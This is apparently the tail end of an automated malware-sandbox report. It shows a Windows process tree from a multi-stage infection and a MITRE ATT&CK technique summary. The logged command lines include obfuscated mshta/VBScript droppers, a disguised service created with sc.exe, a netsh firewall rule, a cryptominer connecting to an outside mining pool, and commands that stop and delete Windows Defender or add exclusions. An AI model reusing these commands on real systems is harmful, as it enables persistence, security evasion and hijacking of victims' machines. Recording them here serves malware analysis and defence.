                                                                                    • C:\Users\Admin\AppData\Local\Temp\iqt4f2st.msg\fa041e8b.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\iqt4f2st.msg\fa041e8b.exe
                                                                                      6⤵
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      • Checks SCSI registry key(s)
                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                      PID:4264
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\k3uinste.zaz\GcleanerWW.exe /mixone & exit
                                                                                    5⤵
                                                                                      PID:5280
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yxi45bqw.dwu\toolspab1.exe & exit
                                                                                      5⤵
                                                                                        PID:5912
                                                                                        • C:\Users\Admin\AppData\Local\Temp\yxi45bqw.dwu\toolspab1.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\yxi45bqw.dwu\toolspab1.exe
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:6512
                                                                                          • C:\Users\Admin\AppData\Local\Temp\yxi45bqw.dwu\toolspab1.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\yxi45bqw.dwu\toolspab1.exe
                                                                                            7⤵
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            • Checks SCSI registry key(s)
                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                            PID:7012
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kuy13fyr.hfj\app.exe /8-2222 & exit
                                                                                        5⤵
                                                                                          PID:6200
                                                                                          • C:\Users\Admin\AppData\Local\Temp\kuy13fyr.hfj\app.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\kuy13fyr.hfj\app.exe /8-2222
                                                                                            6⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:6776
                                                                                            • C:\Users\Admin\AppData\Local\Temp\kuy13fyr.hfj\app.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\kuy13fyr.hfj\app.exe" /8-2222
                                                                                              7⤵
                                                                                              • Executes dropped EXE
                                                                                              • Modifies data under HKEY_USERS
                                                                                              PID:5876
                                                                                • C:\Users\Admin\AppData\Local\Temp\1C3D.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\1C3D.exe
                                                                                  1⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:3484
                                                                                  • C:\Users\Admin\AppData\Local\Temp\1C3D.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\1C3D.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • Modifies data under HKEY_USERS
                                                                                    • Modifies system certificate store
                                                                                    PID:5460
                                                                                • C:\Users\Admin\AppData\Local\Temp\1EAF.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\1EAF.exe
                                                                                  1⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:3156
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\yvgsetyr\
                                                                                    2⤵
                                                                                      PID:2224
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\zgqwyuzy.exe" C:\Windows\SysWOW64\yvgsetyr\
                                                                                      2⤵
                                                                                        PID:508
                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                        "C:\Windows\System32\sc.exe" create yvgsetyr binPath= "C:\Windows\SysWOW64\yvgsetyr\zgqwyuzy.exe /d\"C:\Users\Admin\AppData\Local\Temp\1EAF.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                        2⤵
                                                                                          PID:4024
                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                          "C:\Windows\System32\sc.exe" description yvgsetyr "wifi internet conection"
                                                                                          2⤵
                                                                                            PID:3028
                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                            "C:\Windows\System32\sc.exe" start yvgsetyr
                                                                                            2⤵
                                                                                              PID:3476
                                                                                            • C:\Windows\SysWOW64\netsh.exe
                                                                                              "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                              2⤵
                                                                                                PID:4160
                                                                                            • C:\Users\Admin\AppData\Local\Temp\2596.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\2596.exe
                                                                                              1⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:3780
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                cmd.exe /c taskkill /f /im chrome.exe
                                                                                                2⤵
                                                                                                  PID:2168
                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                    taskkill /f /im chrome.exe
                                                                                                    3⤵
                                                                                                    • Kills process with taskkill
                                                                                                    PID:4744
                                                                                              • C:\Users\Admin\AppData\Local\Temp\2EFD.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\2EFD.exe
                                                                                                1⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:640
                                                                                              • C:\Users\Admin\AppData\Local\Temp\3140.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\3140.exe
                                                                                                1⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:2216
                                                                                              • C:\Users\Admin\AppData\Local\Temp\345E.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\345E.exe
                                                                                                1⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:1172
                                                                                              • C:\Users\Admin\AppData\Local\Temp\3BB2.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\3BB2.exe
                                                                                                1⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4352
                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                  "C:\Windows\System32\mshta.exe" VbsCript: clOSE ( CrEAteOBJect ("WscRIPt.ShELL" ). rUN ( "CMd.EXE /q /c Copy /Y ""C:\Users\Admin\AppData\Local\Temp\3BB2.exe"" ..\IpDIhVj3g.ExE && STARt ..\IpDIhVj3g.EXe /PyPXDDGMMiEeTQRVIP2SQdwWi2M& IF """"=="""" for %s IN ( ""C:\Users\Admin\AppData\Local\Temp\3BB2.exe"") do taskkill -f /Im ""%~nxs"" " , 0 , truE ) )
                                                                                                  2⤵
                                                                                                    PID:4504
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /q /c Copy /Y "C:\Users\Admin\AppData\Local\Temp\3BB2.exe" ..\IpDIhVj3g.ExE && STARt ..\IpDIhVj3g.EXe /PyPXDDGMMiEeTQRVIP2SQdwWi2M& IF ""=="" for %s IN ( "C:\Users\Admin\AppData\Local\Temp\3BB2.exe") do taskkill -f /Im "%~nxs"
                                                                                                      3⤵
                                                                                                        PID:4728
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IpDIhVj3g.ExE
                                                                                                          ..\IpDIhVj3g.EXe /PyPXDDGMMiEeTQRVIP2SQdwWi2M
                                                                                                          4⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:1828
                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                            "C:\Windows\System32\mshta.exe" VbsCript: clOSE ( CrEAteOBJect ("WscRIPt.ShELL" ). rUN ( "CMd.EXE /q /c Copy /Y ""C:\Users\Admin\AppData\Local\Temp\IpDIhVj3g.ExE"" ..\IpDIhVj3g.ExE && STARt ..\IpDIhVj3g.EXe /PyPXDDGMMiEeTQRVIP2SQdwWi2M& IF ""/PyPXDDGMMiEeTQRVIP2SQdwWi2M""=="""" for %s IN ( ""C:\Users\Admin\AppData\Local\Temp\IpDIhVj3g.ExE"") do taskkill -f /Im ""%~nxs"" " , 0 , truE ) )
                                                                                                            5⤵
                                                                                                              PID:2116
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /q /c Copy /Y "C:\Users\Admin\AppData\Local\Temp\IpDIhVj3g.ExE" ..\IpDIhVj3g.ExE && STARt ..\IpDIhVj3g.EXe /PyPXDDGMMiEeTQRVIP2SQdwWi2M& IF "/PyPXDDGMMiEeTQRVIP2SQdwWi2M"=="" for %s IN ( "C:\Users\Admin\AppData\Local\Temp\IpDIhVj3g.ExE") do taskkill -f /Im "%~nxs"
                                                                                                                6⤵
                                                                                                                  PID:4576
                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                "C:\Windows\System32\mshta.exe" VBSCrIpT: cLose ( CreAteObject( "wSCrIPt.ShelL" ). RUN ( "cMd /Q /C ecHo 6C:\Users\Admin\AppData\Local\TempZwG> QEFuCrB.w &ECHO | SeT /p = ""MZ"" > 0CZKPbA.~i &copy /Y /b 0CZKPBA.~i +HzMuGQn.ebg + 3KLPjZ48.1 + JBBP.aZ +jjD1CZ.Z +ME53U.RD + G8HVV~AW.A + QEFuCRB.w ..\LPHzR4.XZ &sTaRt regsvr32.exe ..\LphZr4.XZ /U -S & dEl /Q * " ,0 , tRuE ) )
                                                                                                                5⤵
                                                                                                                  PID:3028
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /Q /C ecHo 6C:\Users\Admin\AppData\Local\TempZwG> QEFuCrB.w &ECHO | SeT /p = "MZ" >0CZKPbA.~i &copy /Y /b 0CZKPBA.~i +HzMuGQn.ebg + 3KLPjZ48.1 + JBBP.aZ +jjD1CZ.Z +ME53U.RD + G8HVV~AW.A + QEFuCRB.w ..\LPHzR4.XZ &sTaRt regsvr32.exe ..\LphZr4.XZ /U -S& dEl /Q *
                                                                                                                    6⤵
                                                                                                                      PID:4204
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" ECHO "
                                                                                                                        7⤵
                                                                                                                          PID:4476
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>0CZKPbA.~i"
                                                                                                                          7⤵
                                                                                                                            PID:904
                                                                                                                          • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                            regsvr32.exe ..\LphZr4.XZ /U -S
                                                                                                                            7⤵
                                                                                                                            • Loads dropped DLL
                                                                                                                            • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                                                            PID:4772
                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                      taskkill -f /Im "3BB2.exe"
                                                                                                                      4⤵
                                                                                                                      • Kills process with taskkill
                                                                                                                      PID:3308
                                                                                                              • C:\Windows\SysWOW64\yvgsetyr\zgqwyuzy.exe
                                                                                                                C:\Windows\SysWOW64\yvgsetyr\zgqwyuzy.exe /d"C:\Users\Admin\AppData\Local\Temp\1EAF.exe"
                                                                                                                1⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                PID:4272
                                                                                                                • C:\Windows\SysWOW64\svchost.exe
                                                                                                                  svchost.exe
                                                                                                                  2⤵
                                                                                                                  • Drops file in System32 directory
                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                  PID:5100
                                                                                                                  • C:\Windows\SysWOW64\svchost.exe
                                                                                                                    svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                                                                                                                    3⤵
                                                                                                                      PID:1684
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\4587.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\4587.exe
                                                                                                                  1⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Loads dropped DLL
                                                                                                                  • Checks processor information in registry
                                                                                                                  PID:4580
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im 4587.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\4587.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                    2⤵
                                                                                                                      PID:3688
                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                        taskkill /im 4587.exe /f
                                                                                                                        3⤵
                                                                                                                        • Kills process with taskkill
                                                                                                                        PID:5192
                                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                                        timeout /t 6
                                                                                                                        3⤵
                                                                                                                        • Delays execution with timeout.exe
                                                                                                                        PID:5900
                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                    1⤵
                                                                                                                    • Drops file in Windows directory
                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                    • Modifies registry class
                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                    PID:4464
                                                                                                                  • C:\Windows\system32\browser_broker.exe
                                                                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                    1⤵
                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                    PID:3728
                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                    1⤵
                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                    PID:4404
                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                    1⤵
                                                                                                                      PID:5320
                                                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                                                        C:\Windows\system32\WerFault.exe -u -p 5320 -s 1224
                                                                                                                        2⤵
                                                                                                                        • Program crash
                                                                                                                        • Checks processor information in registry
                                                                                                                        • Enumerates system info in registry
                                                                                                                        PID:5624
                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                      1⤵
                                                                                                                      • Modifies registry class
                                                                                                                      PID:4084
                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
                                                                                                                      1⤵
                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                      PID:5416
                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                      1⤵
                                                                                                                        PID:5260
                                                                                                                      • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                        rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                        1⤵
                                                                                                                        • Process spawned unexpected child process
                                                                                                                        PID:5372
                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                          rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                          2⤵
                                                                                                                          • Loads dropped DLL
                                                                                                                          PID:5784
                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                        1⤵
                                                                                                                        • Modifies Internet Explorer settings
                                                                                                                        • Modifies registry class
                                                                                                                        PID:6208
                                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                        1⤵
                                                                                                                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                        PID:2600
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\DCE1.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\DCE1.exe
                                                                                                                        1⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:4168
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1CF.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\1CF.exe
                                                                                                                        1⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:212
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:5880
                                                                                                                          • C:\Windows\System32\sc.exe
                                                                                                                            "C:\Windows\System32\sc.exe" stop WinDefend
                                                                                                                            3⤵
                                                                                                                              PID:7020
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /WindowState 0 /CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" /StartDirectory "" /RunAs 8 /Run
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:6652
                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse
                                                                                                                              3⤵
                                                                                                                              • Drops file in System32 directory
                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                              PID:4944
                                                                                                                          • C:\Windows\System32\WScript.exe
                                                                                                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\_Ilhfpjcnwnajcrpxnvjafck.vbs"
                                                                                                                            2⤵
                                                                                                                              PID:6776
                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Drivers\Notepad.exe'
                                                                                                                                3⤵
                                                                                                                                  PID:6452
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1CF.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\1CF.exe
                                                                                                                                2⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:512
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1CF.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\1CF.exe
                                                                                                                                2⤵
                                                                                                                                  PID:6032
                                                                                                                                • C:\Windows\system32\WerFault.exe
                                                                                                                                  C:\Windows\system32\WerFault.exe -u -p 212 -s 1648
                                                                                                                                  2⤵
                                                                                                                                  • Program crash
                                                                                                                                  PID:4620
                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                1⤵
                                                                                                                                • Drops file in Windows directory
                                                                                                                                • Modifies registry class
                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                PID:4960
                                                                                                                              • C:\Windows\system32\browser_broker.exe
                                                                                                                                C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                1⤵
                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                PID:5548
                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                1⤵
                                                                                                                                • Modifies registry class
                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                PID:6932
                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                1⤵
                                                                                                                                • Modifies registry class
                                                                                                                                PID:5352
                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                1⤵
                                                                                                                                • Modifies registry class
                                                                                                                                PID:5356
                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                1⤵
                                                                                                                                • Modifies registry class
                                                                                                                                PID:3652
                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                1⤵
                                                                                                                                  PID:6024
                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                  1⤵
                                                                                                                                  • Modifies registry class
                                                                                                                                  PID:5956
                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                  1⤵
                                                                                                                                  • Modifies registry class
                                                                                                                                  PID:4292
                                                                                                                                  • C:\Windows\system32\WerFault.exe
                                                                                                                                    C:\Windows\system32\WerFault.exe -u -p 4292 -s 2012
                                                                                                                                    2⤵
                                                                                                                                    • Program crash
                                                                                                                                    PID:6868
                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                  1⤵
                                                                                                                                  • Modifies registry class
                                                                                                                                  PID:2368
                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                  1⤵
                                                                                                                                  • Drops file in Windows directory
                                                                                                                                  • Modifies registry class
                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                  PID:5648
                                                                                                                                • C:\Windows\system32\browser_broker.exe
                                                                                                                                  C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                  1⤵
                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                  PID:3140
                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                  1⤵
                                                                                                                                  • Modifies registry class
                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                  PID:4436
                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                  1⤵
                                                                                                                                    PID:6868
                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                    1⤵
                                                                                                                                    • Modifies registry class
                                                                                                                                    PID:3900
                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                    1⤵
                                                                                                                                    • Modifies registry class
                                                                                                                                    PID:724
                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                    1⤵
                                                                                                                                      PID:5788
                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                      1⤵
                                                                                                                                      • Modifies registry class
                                                                                                                                      PID:4572

                                                                                                                                    Network

                                                                                                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                    Persistence

                                                                                                                                    New Service

                                                                                                                                    1
                                                                                                                                    T1050

                                                                                                                                    Modify Existing Service

                                                                                                                                    2
                                                                                                                                    T1031

                                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                                    2
                                                                                                                                    T1060

                                                                                                                                    Privilege Escalation

                                                                                                                                    New Service

                                                                                                                                    1
                                                                                                                                    T1050

                                                                                                                                    Defense Evasion

                                                                                                                                    Disabling Security Tools

                                                                                                                                    1
                                                                                                                                    T1089

                                                                                                                                    Modify Registry

                                                                                                                                    5
                                                                                                                                    T1112

                                                                                                                                    Impair Defenses

                                                                                                                                    1
                                                                                                                                    T1562

                                                                                                                                    File Permissions Modification

                                                                                                                                    1
                                                                                                                                    T1222

                                                                                                                                    Install Root Certificate

                                                                                                                                    1
                                                                                                                                    T1130

                                                                                                                                    Credential Access

                                                                                                                                    Credentials in Files

                                                                                                                                    3
                                                                                                                                    T1081

                                                                                                                                    Discovery

                                                                                                                                    Software Discovery

                                                                                                                                    1
                                                                                                                                    T1518

                                                                                                                                    Query Registry

                                                                                                                                    5
                                                                                                                                    T1012

                                                                                                                                    System Information Discovery

                                                                                                                                    6
                                                                                                                                    T1082

